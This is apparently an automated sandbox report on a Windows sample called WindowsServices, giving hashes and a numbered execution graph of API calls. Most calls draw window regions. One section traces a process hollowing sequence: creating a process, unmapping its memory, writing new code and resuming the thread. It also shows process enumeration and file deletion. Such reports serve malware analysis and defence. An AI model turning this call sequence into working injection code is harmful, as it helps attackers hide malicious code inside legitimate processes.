                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1750876710.0000000000B32000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B32000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_b32000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef5a5a1aba23ed778780014232c5cf34f2b9b5e1a462a0efbd6383665981d2ce
                                                                        • Instruction ID: c53372230f59a2cebec8b621451c7bd280ae1c937f97fce7045352bd629b65d6
                                                                        • Opcode Fuzzy Hash: ef5a5a1aba23ed778780014232c5cf34f2b9b5e1a462a0efbd6383665981d2ce
                                                                        • Instruction Fuzzy Hash: DCD05E352402814FCB15DB1CD2D8F5977D4AB44B14F1644E8AC108B762C7A8D8C4DA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1160
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 2340 40a280 2353 405a10 2340->2353 2342 40a2a7 2343 405a10 104 API calls 2342->2343 2344 40a2b0 SendMessageA SendMessageA GetWindowRect 2343->2344 2480 4052c0 CopyRect 2344->2480 2346 40a30b _ftol 2347 40afbe 2346->2347 2348 40a342 GetWindowRect 2347->2348 2349 40a359 2348->2349 2481 405300 CopyRect 2349->2481 2352 40a38c 2552 40b0e0 2353->2552 2356 407516 LoadLibraryA 2358 407568 LoadLibraryA 2356->2358 2360 407652 LoadLibraryA 2358->2360 2361 40766b LoadLibraryA 2360->2361 2362 407681 LoadLibraryA 2361->2362 2363 407694 LoadLibraryA 2362->2363 2364 4076a4 LoadLibraryA 2363->2364 2365 4076ba LoadLibraryA 2364->2365 2366 4076ca LoadLibraryA 2365->2366 2367 4076da LoadLibraryA 2366->2367 2368 4076ea LoadLibraryA 2367->2368 2370 4077b1 LoadLibraryA 2368->2370 2371 4077c1 LoadLibraryA 2370->2371 2372 4077d1 LoadLibraryA 2371->2372 2373 4077e7 LoadLibraryA 2372->2373 2374 4077fd LoadLibraryA 2373->2374 2375 407813 LoadLibraryA 2374->2375 2376 407829 LoadLibraryA 2375->2376 2377 40783f LoadLibraryA 2376->2377 2378 40784f LoadLibraryA 2377->2378 2379 407865 LoadLibraryA 2378->2379 2380 40787b LoadLibraryA 2379->2380 2382 407a48 2380->2382 2383 407ad3 GetModuleFileNameW 2382->2383 2385 408afd 2382->2385 2393 408e4b 2382->2393 2384 407b09 wcscpy 2383->2384 2404 407b25 wcscpy wcscat wcscpy wcscat wcscat 2383->2404 2384->2404 2387 408c26 CreateFileW 2385->2387 2388 408cf7 2385->2388 2435 408b16 2385->2435 2387->2393 2396 408c78 CreateFileW 2387->2396 2390 408d00 CreateToolhelp32Snapshot 2388->2390 2399 408e47 2388->2399 2392 408d9c Process32First 2390->2392 2390->2393 2391 408158 CreateProcessW 2395 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 2391->2395 2441 408225 2391->2441 2405 408de6 Process32Next 2392->2405 2406 408e2d FindCloseChangeNotification 2392->2406 2393->2342 2398 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 2395->2398 2396->2393 2397 408c99 CreateFileW 2396->2397 2397->2393 2400 408cbc CreateFileW 2397->2400 2398->2441 2399->2393 2407 408f3a CreateFileA 2399->2407 2400->2393 2403 408cdd FindCloseChangeNotification 2400->2403 2402 408272 VirtualAllocEx 2402->2441 2411 408ce7 2403->2411 2404->2391 2405->2406 2408 408df7 strstr 2405->2408 2406->2342 2407->2393 2410 408fc7 CreateFileA 2407->2410 2412 408e3a 2408->2412 2413 408e0b strstr 2408->2413 2409 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 2409->2441 2410->2393 2415 408fe9 CreateFileW 2410->2415 2411->2342 2412->2342 2413->2412 2416 408e1f 2413->2416 2414 4082b6 VirtualAllocEx 2414->2441 2424 40903b wcslen CreateFileW 2415->2424 2416->2406 2416->2408 2417 408327 WriteProcessMemory 2417->2417 2417->2441 2418 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 2421 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 2418->2421 2418->2441 2420 40838c WriteProcessMemory 2420->2418 2420->2420 2421->2441 2422 4084c1 wcscpy wcscat MoveFileExW CopyFileW 2425 4087f8 ResumeThread 2422->2425 2422->2441 2423 4089af ResumeThread 2423->2441 2426 409077 wcscat CreateFileW 2424->2426 2425->2441 2431 409111 2426->2431 2432 40911a VirtualAlloc 2426->2432 2427 408a4d wcscat 2430 408a77 wcsstr 2427->2430 2429 408813 Sleep CreateToolhelp32Snapshot Module32First 2429->2441 2433 408a8f CreateFileW 2430->2433 2430->2441 2431->2432 2436 409148 ReadFile 2432->2436 2433->2441 2434 408900 Wow64SuspendThread 2434->2441 2435->2342 2445 40915c FindCloseChangeNotification 2436->2445 2437 4088c8 strstr 2437->2441 2442 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 2437->2442 2438 408945 ResumeThread Sleep DeleteFileW 2440 408977 Wow64SuspendThread 2438->2440 2438->2441 2439 408ad8 TerminateProcess 2439->2441 2444 408988 Sleep MoveFileExW 2440->2444 2441->2385 2441->2391 2441->2402 2441->2409 2441->2414 2441->2417 2441->2418 2441->2420 2441->2422 2441->2423 2441->2425 2441->2427 2441->2429 2441->2434 2441->2437 2441->2438 2441->2439 2441->2444 2442->2441 2444->2423 2444->2441 2447 4091c3 VirtualAlloc 2445->2447 2449 4092a3 2447->2449 2448 409b8a 2450 405a10 ExitProcess 2448->2450 2449->2448 2451 409409 2449->2451 2454 405a10 ExitProcess 2449->2454 2452 409bd6 2450->2452 2455 409428 2451->2455 2460 405a10 ExitProcess 2451->2460 2453 409be6 2452->2453 2456 405a10 ExitProcess 2452->2456 2457 409c07 2453->2457 2458 409c1e 2453->2458 2459 4093fd 2454->2459 2466 405a10 ExitProcess 2455->2466 2478 40949e 2455->2478 2456->2453 2461 405a10 ExitProcess 2457->2461 2463 409c27 2458->2463 2464 409c3e 2458->2464 2459->2451 2462 409404 2459->2462 2465 40941c 2460->2465 2470 409c12 2461->2470 2554 405a00 ExitProcess 2462->2554 2472 405a10 ExitProcess 2463->2472 2468 405a10 ExitProcess 2464->2468 2465->2455 2467 409423 2465->2467 2469 40945b 2466->2469 2555 405a00 ExitProcess 2467->2555 2468->2393 2476 405a10 ExitProcess 2469->2476 2469->2478 2470->2342 2473 409c32 2472->2473 2473->2342 2475 409a05 2475->2448 2477 405a10 ExitProcess 2475->2477 2476->2478 2477->2448 2478->2475 2479 40996b CreateProcessA Sleep TerminateProcess 2478->2479 2479->2475 2480->2346 2556 403e10 2481->2556 2483 405331 CopyRect 2484 403e10 7 API calls 2483->2484 2485 405351 CopyRect 2484->2485 2486 403e10 7 API calls 2485->2486 2487 405371 CopyRect 2486->2487 2488 403e10 7 API calls 2487->2488 2489 405391 CopyRect 2488->2489 2490 403e10 7 API calls 2489->2490 2491 4053b1 CopyRect 2490->2491 2492 403e10 7 API calls 2491->2492 2493 4053d1 CopyRect 2492->2493 2494 403e10 7 API calls 2493->2494 2495 4053f1 CopyRect 2494->2495 2496 403e10 7 API calls 2495->2496 2497 405411 CopyRect 2496->2497 2498 403e10 7 API calls 2497->2498 2499 405431 CopyRect 2498->2499 2500 403e10 7 API calls 2499->2500 2501 405451 CopyRect 2500->2501 2502 403e10 7 API calls 2501->2502 2503 405471 CopyRect 2502->2503 2504 403e10 7 API calls 2503->2504 2505 405491 CopyRect 2504->2505 2506 403e10 7 API calls 2505->2506 2507 4054b1 CopyRect 2506->2507 2508 403e10 7 API calls 2507->2508 2509 4054d1 CopyRect 2508->2509 2510 403e10 7 API calls 2509->2510 2511 4054f1 CopyRect 2510->2511 2512 403e10 7 API calls 2511->2512 2513 405511 CopyRect 2512->2513 2514 403e10 7 API calls 2513->2514 2515 405531 CopyRect 2514->2515 2516 403e10 7 API calls 2515->2516 2517 405551 CopyRect 2516->2517 2518 403e10 7 API calls 2517->2518 2519 405571 CopyRect 2518->2519 2520 403e10 7 API calls 2519->2520 2521 405591 CopyRect 2520->2521 2522 403e10 7 API calls 2521->2522 2523 4055b1 CopyRect 2522->2523 2524 403e10 7 API calls 2523->2524 2525 4055d1 CopyRect 2524->2525 2526 403e10 7 API calls 2525->2526 2527 4055f1 CopyRect 2526->2527 2528 403e10 7 API calls 2527->2528 2529 405611 CopyRect 2528->2529 2530 403e10 7 API calls 2529->2530 2531 405631 CopyRect 2530->2531 2532 403e10 7 API calls 2531->2532 2533 405651 CopyRect 2532->2533 2534 403e10 7 API calls 2533->2534 2535 405671 CopyRect 2534->2535 2536 403e10 7 API calls 2535->2536 2537 405691 CopyRect 2536->2537 2538 403e10 7 API calls 2537->2538 2539 4056b1 CopyRect 2538->2539 2540 403e10 7 API calls 2539->2540 2541 4056d1 CopyRect 2540->2541 2542 403e10 7 API calls 2541->2542 2543 4056f1 CopyRect 2542->2543 2544 403e10 7 API calls 2543->2544 2545 405711 CopyRect 2544->2545 2546 403e10 7 API calls 2545->2546 2547 405731 CopyRect 2546->2547 2548 403e10 7 API calls 2547->2548 2549 405751 CopyRect 2548->2549 2550 403e10 7 API calls 2549->2550 2551 405771 SetWindowRgn 2550->2551 2551->2352 2553 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2552->2553 2553->2356 2560 403e3a 2556->2560 2557 403fcd 2558 40404a CreatePolygonRgn 2557->2558 2559 403fdf CreatePolygonRgn 2557->2559 2566 404058 2558->2566 2561 403fef 2559->2561 2560->2557 2562 403f74 _ftol _ftol 2560->2562 2563 403ffa CombineRgn CreatePolygonRgn 2561->2563 2562->2557 2562->2562 2564 40ae02 2563->2564 2565 40401e CombineRgn 2564->2565 2565->2566 2566->2483 2956 40aac0 GetClientRect 2960 404ec0 CopyRect 2956->2960 2958 40ab29 LoadCursorA SetCursor 2959 40aae6 2959->2958 3039 403c20 2960->3039 2962 404ef1 2963 404f06 CopyRect 2962->2963 2964 404ef8 2962->2964 2965 403c20 4 API calls 2963->2965 2964->2959 2966 404f23 2965->2966 2967 404f38 CopyRect 2966->2967 2968 404f2a 2966->2968 2969 403c20 4 API calls 2967->2969 2968->2959 2970 404f55 2969->2970 2971 404f6a CopyRect 2970->2971 2972 404f5c 2970->2972 2973 403c20 4 API calls 2971->2973 2972->2959 2974 404f87 2973->2974 2975 404f9c CopyRect 2974->2975 2976 404f8e 2974->2976 2977 403c20 4 API calls 2975->2977 2976->2959 2978 404fb9 2977->2978 2979 404fc0 2978->2979 2980 404fce CopyRect 2978->2980 2979->2959 2981 403c20 4 API calls 2980->2981 2982 404feb 2981->2982 2983 405000 CopyRect 2982->2983 2984 404ff2 2982->2984 2985 403c20 4 API calls 2983->2985 2984->2959 2986 40501d 2985->2986 2987 405032 CopyRect 2986->2987 2988 405024 2986->2988 2989 403c20 4 API calls 2987->2989 2988->2959 2990 40504f 2989->2990 2991 405064 CopyRect 2990->2991 2992 405056 2990->2992 2993 403c20 4 API calls 2991->2993 2992->2959 2994 405081 2993->2994 2995 405096 CopyRect 2994->2995 2996 405088 2994->2996 2997 403c20 4 API calls 2995->2997 2996->2959 2998 4050b3 2997->2998 2999 4050c8 CopyRect 2998->2999 3000 4050ba 2998->3000 3001 403c20 4 API calls 2999->3001 3000->2959 3002 4050e5 3001->3002 3003 4050fa CopyRect 3002->3003 3004 4050ec 3002->3004 3005 403c20 4 API calls 3003->3005 3004->2959 3006 405117 3005->3006 3007 40512c CopyRect 3006->3007 3008 40511e 3006->3008 3009 403c20 4 API calls 3007->3009 3008->2959 3010 405149 3009->3010 3011 405150 3010->3011 3012 40515e CopyRect 3010->3012 3011->2959 3013 403c20 4 API calls 3012->3013 3014 40517b 3013->3014 3015 405190 CopyRect 3014->3015 3016 405182 3014->3016 3017 403c20 4 API calls 3015->3017 3016->2959 3018 4051ad 3017->3018 3019 4051c2 CopyRect 3018->3019 3020 4051b4 3018->3020 3021 403c20 4 API calls 3019->3021 3020->2959 3022 4051df 3021->3022 3023 4051f4 CopyRect 3022->3023 3024 4051e6 3022->3024 3025 403c20 4 API calls 3023->3025 3024->2959 3026 405211 3025->3026 3027 405226 CopyRect 3026->3027 3028 405218 3026->3028 3029 403c20 4 API calls 3027->3029 3028->2959 3030 405243 3029->3030 3031 405258 CopyRect 3030->3031 3032 40524a 3030->3032 3033 403c20 4 API calls 3031->3033 3032->2959 3034 405275 3033->3034 3035 40528a CopyRect 3034->3035 3036 40527c 3034->3036 3037 403c20 4 API calls 3035->3037 3036->2959 3038 4052a7 3037->3038 3038->2959 3042 403d04 3039->3042 3040 403d94 CreatePolygonRgn 3041 403dad 3040->3041 3043 403db1 PtInRegion 3041->3043 3046 403dca 3041->3046 3042->3040 3044 403d37 _ftol _ftol 3042->3044 3043->3046 3044->3044 3045 403d90 3044->3045 3045->3040 3046->2962 3055 40ac80 ExtTextOutA 3056 409c80 3065 401000 CopyRect 3056->3065 3058 409cf3 _ftol _ftol _ftol 3059 40afbe 3058->3059 3060 409d7d GetWindowRect 3059->3060 3061 409d98 3060->3061 3066 402500 CopyRect 3061->3066 3064 409dd5 3065->3058 3067 403e10 7 API calls 3066->3067 3068 402531 CopyRect 3067->3068 3397 404850 3068->3397 3070 402551 CopyRect 3071 403e10 7 API calls 3070->3071 3072 402571 CopyRect 3071->3072 3398 404850 3072->3398 3074 402591 CopyRect 3075 403e10 7 API calls 3074->3075 3076 4025b1 CopyRect 3075->3076 3399 404850 3076->3399 3078 4025d1 CopyRect 3079 403e10 7 API calls 3078->3079 3080 4025f1 CopyRect 3079->3080 3400 404850 3080->3400 3082 402611 CopyRect 3083 403e10 7 API calls 3082->3083 3084 402631 CopyRect 3083->3084 3401 404850 3084->3401 3086 402651 CopyRect 3087 403e10 7 API calls 3086->3087 3088 402671 CopyRect 3087->3088 3402 404850 3088->3402 3090 402691 CopyRect 3091 403e10 7 API calls 3090->3091 3092 4026b1 CopyRect 3091->3092 3403 404850 3092->3403 3094 4026d1 CopyRect 3095 403e10 7 API calls 3094->3095 3096 4026f1 CopyRect 3095->3096 3404 404850 3096->3404 3098 402711 CopyRect 3099 403e10 7 API calls 3098->3099 3100 402731 CopyRect 3099->3100 3405 404850 3100->3405 3102 402751 CopyRect 3103 403e10 7 API calls 3102->3103 3104 402771 CopyRect 3103->3104 3406 404850 3104->3406 3106 402791 CopyRect 3107 403e10 7 API calls 3106->3107 3108 4027b1 CopyRect 3107->3108 3407 404850 3108->3407 3110 4027d1 CopyRect 3111 403e10 7 API calls 3110->3111 3112 4027f1 CopyRect 3111->3112 3408 404850 3112->3408 3114 402811 CopyRect 3115 403e10 7 API calls 3114->3115 3116 402831 CopyRect 3115->3116 3409 404850 3116->3409 3118 402851 CopyRect 3119 403e10 7 API calls 3118->3119 3120 402871 CopyRect 3119->3120 3410 404850 3120->3410 3122 402891 CopyRect 3123 403e10 7 API calls 3122->3123 3124 4028b1 CopyRect 3123->3124 3411 404850 3124->3411 3126 4028d1 CopyRect 3127 403e10 7 API calls 3126->3127 3128 4028f1 CopyRect 3127->3128 3412 404850 3128->3412 3130 402911 CopyRect 3131 403e10 7 API calls 3130->3131 3132 402931 CopyRect 3131->3132 3413 404850 3132->3413 3134 402951 CopyRect 3135 403e10 7 API calls 3134->3135 3136 402971 CopyRect 3135->3136 3414 404850 3136->3414 3138 402991 CopyRect 3139 403e10 7 API calls 3138->3139 3140 4029b1 CopyRect 3139->3140 3415 404850 3140->3415 3142 4029d1 CopyRect 3143 403e10 7 API calls 3142->3143 3144 4029f1 CopyRect 3143->3144 3416 404850 3144->3416 3146 402a11 CopyRect 3147 403e10 7 API calls 3146->3147 3148 402a31 CopyRect 3147->3148 3417 404850 3148->3417 3150 402a51 CopyRect 3151 403e10 7 API calls 3150->3151 3152 402a71 CopyRect 3151->3152 3418 404850 3152->3418 3154 402a91 CopyRect 3155 403e10 7 API calls 3154->3155 3156 402ab1 CopyRect 3155->3156 3419 404850 3156->3419 3158 402ad1 CopyRect 3159 403e10 7 API calls 3158->3159 3160 402af1 CopyRect 3159->3160 3420 404850 3160->3420 3162 402b11 CopyRect 3163 403e10 7 API calls 3162->3163 3164 402b31 CopyRect 3163->3164 3421 404850 3164->3421 3166 402b51 CopyRect 3167 403e10 7 API calls 3166->3167 3168 402b71 CopyRect 3167->3168 3422 404850 3168->3422 3170 402b91 CopyRect 3171 403e10 7 API calls 3170->3171 3172 402bb1 CopyRect 3171->3172 3423 404850 3172->3423 3174 402bd1 CopyRect 3175 403e10 7 API calls 3174->3175 3176 402bf1 CopyRect 3175->3176 3424 404850 3176->3424 3178 402c11 CopyRect 3179 403e10 7 API calls 3178->3179 3180 402c31 CopyRect 3179->3180 3425 404850 3180->3425 3182 402c51 CopyRect 3183 403e10 7 API calls 3182->3183 3184 402c71 CopyRect 3183->3184 3426 404850 3184->3426 3186 402c91 CopyRect 3187 403e10 7 API calls 3186->3187 3188 402cb1 CopyRect 3187->3188 3427 404850 3188->3427 3190 402cd1 CopyRect 3191 403e10 7 API calls 3190->3191 3192 402cf1 CopyRect 3191->3192 3428 404850 3192->3428 3194 402d11 CopyRect 3195 403e10 7 API calls 3194->3195 3196 402d31 CopyRect 3195->3196 3429 404850 3196->3429 3198 402d51 CopyRect 3199 403e10 7 API calls 3198->3199 3200 402d71 CopyRect 3199->3200 3430 404850 3200->3430 3202 402d91 CopyRect 3203 403e10 7 API calls 3202->3203 3204 402db1 CopyRect 3203->3204 3431 404850 3204->3431 3206 402dd1 CopyRect 3207 403e10 7 API calls 3206->3207 3208 402df1 CopyRect 3207->3208 3432 404850 3208->3432 3210 402e11 CopyRect 3211 403e10 7 API calls 3210->3211 3212 402e31 CopyRect 3211->3212 3433 404850 3212->3433 3214 402e51 CopyRect 3215 403e10 7 API calls 3214->3215 3216 402e71 CopyRect 3215->3216 3434 404850 3216->3434 3218 402e91 CopyRect 3219 403e10 7 API calls 3218->3219 3220 402eb1 CopyRect 3219->3220 3435 404850 3220->3435 3222 402ed1 CopyRect 3223 403e10 7 API calls 3222->3223 3224 402ef1 CopyRect 3223->3224 3436 404850 3224->3436 3226 402f11 CopyRect 3227 403e10 7 API calls 3226->3227 3228 402f31 CopyRect 3227->3228 3437 404850 3228->3437 3230 402f51 CopyRect 3231 403e10 7 API calls 3230->3231 3232 402f71 CopyRect 3231->3232 3438 404850 3232->3438 3234 402f91 CopyRect 3235 403e10 7 API calls 3234->3235 3236 402fb1 CopyRect 3235->3236 3439 404850 3236->3439 3238 402fd1 CopyRect 3239 403e10 7 API calls 3238->3239 3240 402ff1 CopyRect 3239->3240 3440 404850 3240->3440 3242 403011 CopyRect 3243 403e10 7 API calls 3242->3243 3244 403031 CopyRect 3243->3244 3441 404850 3244->3441 3246 403051 CopyRect 3247 403e10 7 API calls 3246->3247 3248 403071 CopyRect 3247->3248 3442 404850 3248->3442 3250 403091 CopyRect 3251 403e10 7 API calls 3250->3251 3252 4030b1 CopyRect 3251->3252 3443 404850 3252->3443 3254 4030d1 CopyRect 3255 403e10 7 API calls 3254->3255 3256 4030f1 CopyRect 3255->3256 3444 404850 3256->3444 3258 403111 CopyRect 3259 403e10 7 API calls 3258->3259 3260 403131 CopyRect 3259->3260 3445 404850 3260->3445 3262 403151 CopyRect 3263 403e10 7 API calls 3262->3263 3264 403171 CopyRect 3263->3264 3446 404850 3264->3446 3266 403191 CopyRect 3267 403e10 7 API calls 3266->3267 3268 4031b1 CopyRect 3267->3268 3447 404850 3268->3447 3270 4031d1 CopyRect 3271 403e10 7 API calls 3270->3271 3272 4031f1 CopyRect 3271->3272 3448 404850 3272->3448 3274 403211 CopyRect 3275 403e10 7 API calls 3274->3275 3276 403231 CopyRect 3275->3276 3449 404850 3276->3449 3278 403251 CopyRect 3279 403e10 7 API calls 3278->3279 3280 403271 CopyRect 3279->3280 3450 404850 3280->3450 3282 403291 CopyRect 3283 403e10 7 API calls 3282->3283 3284 4032b1 CopyRect 3283->3284 3451 404850 3284->3451 3286 4032d1 CopyRect 3287 403e10 7 API calls 3286->3287 3288 4032f1 CopyRect 3287->3288 3452 404850 3288->3452 3290 403311 CopyRect 3291 403e10 7 API calls 3290->3291 3292 403331 CopyRect 3291->3292 3453 404850 3292->3453 3294 403351 CopyRect 3295 403e10 7 API calls 3294->3295 3296 403371 CopyRect 3295->3296 3454 404850 3296->3454 3298 403391 CopyRect 3299 403e10 7 API calls 3298->3299 3300 4033b1 CopyRect 3299->3300 3455 404850 3300->3455 3302 4033d1 CopyRect 3303 403e10 7 API calls 3302->3303 3304 4033f1 CopyRect 3303->3304 3456 404850 3304->3456 3306 403411 CopyRect 3307 403e10 7 API calls 3306->3307 3308 403431 CopyRect 3307->3308 3457 404850 3308->3457 3310 403451 CopyRect 3311 403e10 7 API calls 3310->3311 3312 403471 CopyRect 3311->3312 3458 404850 3312->3458 3314 403491 CopyRect 3315 403e10 7 API calls 3314->3315 3316 4034b1 CopyRect 3315->3316 3459 404850 3316->3459 3318 4034d1 CopyRect 3319 403e10 7 API calls 3318->3319 3320 4034f1 CopyRect 3319->3320 3460 404850 3320->3460 3322 403511 CopyRect 3323 403e10 7 API calls 3322->3323 3324 403531 CopyRect 3323->3324 3461 404850 3324->3461 3326 403551 CopyRect 3327 403e10 7 API calls 3326->3327 3328 403571 CopyRect 3327->3328 3462 404850 3328->3462 3330 403591 CopyRect 3331 403e10 7 API calls 3330->3331 3332 4035b1 CopyRect 3331->3332 3463 404850 3332->3463 3334 4035d1 CopyRect 3335 403e10 7 API calls 3334->3335 3336 4035f1 CopyRect 3335->3336 3464 404850 3336->3464 3338 403611 CopyRect 3339 403e10 7 API calls 3338->3339 3340 403631 CopyRect 3339->3340 3465 404850 3340->3465 3342 403651 CopyRect 3343 403e10 7 API calls 3342->3343 3344 403671 CopyRect 3343->3344 3345 403e10 7 API calls 3344->3345 3346 403691 CopyRect 3345->3346 3466 404360 3346->3466 3348 4036b1 CopyRect 3349 403e10 7 API calls 3348->3349 3350 4036d1 CopyRect 3349->3350 3351 404360 7 API calls 3350->3351 3352 4036f1 CopyRect 3351->3352 3353 403e10 7 API calls 3352->3353 3354 403711 CopyRect 3353->3354 3355 404360 7 API calls 3354->3355 3356 403731 CopyRect 3355->3356 3357 404360 7 API calls 3356->3357 3358 403751 CopyRect 3357->3358 3359 403e10 7 API calls 3358->3359 3360 403771 CopyRect 3359->3360 3361 404360 7 API calls 3360->3361 3362 403791 CopyRect 3361->3362 3363 403e10 7 API calls 3362->3363 3364 4037b1 CopyRect 3363->3364 3365 404360 7 API calls 3364->3365 3366 4037d1 CopyRect 3365->3366 3367 403e10 7 API calls 3366->3367 3368 4037f1 CopyRect 3367->3368 3369 404360 7 API calls 3368->3369 3370 403811 CopyRect 3369->3370 3371 404360 7 API calls 3370->3371 3372 403831 CopyRect 3371->3372 3373 404360 7 API calls 3372->3373 3374 403851 CopyRect 3373->3374 3375 403e10 7 API calls 3374->3375 3376 403871 CopyRect 3375->3376 3377 403e10 7 API calls 3376->3377 3378 403891 CopyRect 3377->3378 3379 404360 7 API calls 3378->3379 3380 4038b1 CopyRect 3379->3380 3381 403e10 7 API calls 3380->3381 3382 4038d1 CopyRect 3381->3382 3383 403e10 7 API calls 3382->3383 3384 4038f1 CopyRect 3383->3384 3385 404360 7 API calls 3384->3385 3386 403911 CopyRect 3385->3386 3387 404360 7 API calls 3386->3387 3388 403931 CopyRect 3387->3388 3389 403e10 7 API calls 3388->3389 3390 403951 CopyRect 3389->3390 3391 404360 7 API calls 3390->3391 3392 403971 CopyRect 3391->3392 3393 404360 7 API calls 3392->3393 3394 403991 CopyRect 3393->3394 3395 404360 7 API calls 3394->3395 3396 4039b1 SetWindowRgn SetCapture 3395->3396 3396->3064 3397->3070 3398->3074 3399->3078 3400->3082 3401->3086 3402->3090 3403->3094 3404->3098 3405->3102 3406->3106 3407->3110 3408->3114 3409->3118 3410->3122 3411->3126 3412->3130 3413->3134 3414->3138 3415->3142 3416->3146 3417->3150 3418->3154 3419->3158 3420->3162 3421->3166 3422->3170 3423->3174 3424->3178 3425->3182 3426->3186 3427->3190 3428->3194 3429->3198 3430->3202 3431->3206 3432->3210 3433->3214 3434->3218 3435->3222 3436->3226 3437->3230 3438->3234 3439->3238 3440->3242 3441->3246 3442->3250 3443->3254 3444->3258 3445->3262 3446->3266 3447->3270 3448->3274 3449->3278 3450->3282 3451->3286 3452->3290 3453->3294 3454->3298 3455->3302 3456->3306 3457->3310 3458->3314 3459->3318 3460->3322 3461->3326 3462->3330 3463->3334 3464->3338 3465->3342 3467 4043a3 3466->3467 3468 40454a 3467->3468 3472 4044e9 _ftol _ftol 3467->3472 3469 404560 CreatePolygonRgn 3468->3469 3470 4045cb CreatePolygonRgn 3468->3470 3471 404570 3469->3471 3476 4045d9 3470->3476 3473 40457b CombineRgn CreatePolygonRgn 3471->3473 3472->3468 3472->3472 3474 40ae02 3473->3474 3475 40459f CombineRgn 3474->3475 3475->3476 3476->3348 3478 40a940 GetWindowRect 3479 40aa54 ClientToScreen 3478->3479 3480 40a99f 3478->3480 3482 40aa52 3479->3482 3480->3482 3490 4052c0 CopyRect 3480->3490 3483 40a9d0 _ftol 3483->3482 3484 40a9ec 3483->3484 3484->3482 3485 40aa08 GetWindowRect 3484->3485 3486 40aa1f 3485->3486 3487 405300 42 API calls 3486->3487 3488 40aa30 SetWindowRgn 3487->3488 3491 40a440 IsIconic 3488->3491 3490->3483 3492 40a474 3491->3492 3494 40a50d 3491->3494 3493 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3492->3493 3508 40a508 3493->3508 3495 40a593 CreateCompatibleDC 3494->3495 3507 40a640 3494->3507 3494->3508 3496 40b05a 3495->3496 3498 40a5b2 LPtoDP CreateCompatibleBitmap 3496->3498 3497 40a65a GetWindowRect 3499 40a67d 3497->3499 3500 40a5ef 3498->3500 3509 404a40 CopyRect 3499->3509 3503 40a5fd GetMapMode 3500->3503 3502 40a68e 3505 40a6ad BitBlt 3502->3505 3502->3508 3504 40b054 3503->3504 3506 40a616 DPtoLP 3504->3506 3505->3508 3506->3507 3507->3497 3508->3482 3510 4039c0 3 API calls 3509->3510 3511 404a71 CopyRect 3510->3511 3512 4039c0 3 API calls 3511->3512 3513 404a91 CopyRect 3512->3513 3514 4039c0 3 API calls 3513->3514 3515 404ab1 CopyRect 3514->3515 3516 4039c0 3 API calls 3515->3516 3517 404ad1 CopyRect 3516->3517 3518 4039c0 3 API calls 3517->3518 3519 404af1 CopyRect 3518->3519 3520 4039c0 3 API calls 3519->3520 3521 404b11 CopyRect 3520->3521 3522 4039c0 3 API calls 3521->3522 3523 404b31 CopyRect 3522->3523 3524 4039c0 3 API calls 3523->3524 3525 404b51 CopyRect 3524->3525 3526 4039c0 3 API calls 3525->3526 3527 404b71 CopyRect 3526->3527 3528 4039c0 3 API calls 3527->3528 3529 404b91 CopyRect 3528->3529 3530 4039c0 3 API calls 3529->3530 3531 404bb1 CopyRect 3530->3531 3532 4039c0 3 API calls 3531->3532 3533 404bd1 CopyRect 3532->3533 3534 4039c0 3 API calls 3533->3534 3535 404bf1 CopyRect 3534->3535 3536 4039c0 3 API calls 3535->3536 3537 404c11 CopyRect 3536->3537 3538 4039c0 3 API calls 3537->3538 3539 404c31 CopyRect 3538->3539 3540 4039c0 3 API calls 3539->3540 3541 404c51 CopyRect 3540->3541 3542 4039c0 3 API calls 3541->3542 3543 404c71 CopyRect 3542->3543 3544 4039c0 3 API calls 3543->3544 3545 404c91 CopyRect 3544->3545 3546 4039c0 3 API calls 3545->3546 3547 404cb1 CopyRect 3546->3547 3548 4039c0 3 API calls 3547->3548 3549 404cd1 CopyRect 3548->3549 3550 4039c0 3 API calls 3549->3550 3551 404cf1 CopyRect 3550->3551 3552 4039c0 3 API calls 3551->3552 3553 404d11 CopyRect 3552->3553 3554 4039c0 3 API calls 3553->3554 3555 404d31 CopyRect 3554->3555 3556 4039c0 3 API calls 3555->3556 3557 404d51 CopyRect 3556->3557 3558 4039c0 3 API calls 3557->3558 3559 404d71 CopyRect 3558->3559 3560 4039c0 3 API calls 3559->3560 3561 404d91 CopyRect 3560->3561 3562 4039c0 3 API calls 3561->3562 3563 404db1 CopyRect 3562->3563 3564 4039c0 3 API calls 3563->3564 3565 404dd1 CopyRect 3564->3565 3566 4039c0 3 API calls 3565->3566 3567 404df1 CopyRect 3566->3567 3568 4039c0 3 API calls 3567->3568 3569 404e11 CopyRect 3568->3569 3570 4039c0 3 API calls 3569->3570 3571 404e31 CopyRect 3570->3571 3572 4039c0 3 API calls 3571->3572 3573 404e51 CopyRect 3572->3573 3574 4039c0 3 API calls 3573->3574 3575 404e71 CopyRect 3574->3575 3576 4039c0 3 API calls 3575->3576 3577 404e91 CopyRect 3576->3577 3578 4039c0 3 API calls 3577->3578 3579 404eb1 3578->3579 3579->3502 3588 40ad00 DrawTextA 2567 40b10f __set_app_type __p__fmode __p__commode 2568 40b17e 2567->2568 2569 40b192 2568->2569 2570 40b186 __setusermatherr 2568->2570 2579 40b280 _controlfp 2569->2579 2570->2569 2572 40b197 _initterm __getmainargs _initterm 2573 40b1eb GetStartupInfoA 2572->2573 2575 40b21f GetModuleHandleA 2573->2575 2580 40b2a2 69CE4ED0 2575->2580 2578 40b243 exit _XcptFilter 2579->2572 2580->2578 2581 40ac50 TextOutA 2583 40a810 2587 409c60 2583->2587 2585 40a838 ReleaseCapture GetWindowRect 2586 40a863 2585->2586 2588 409c6c 2587->2588 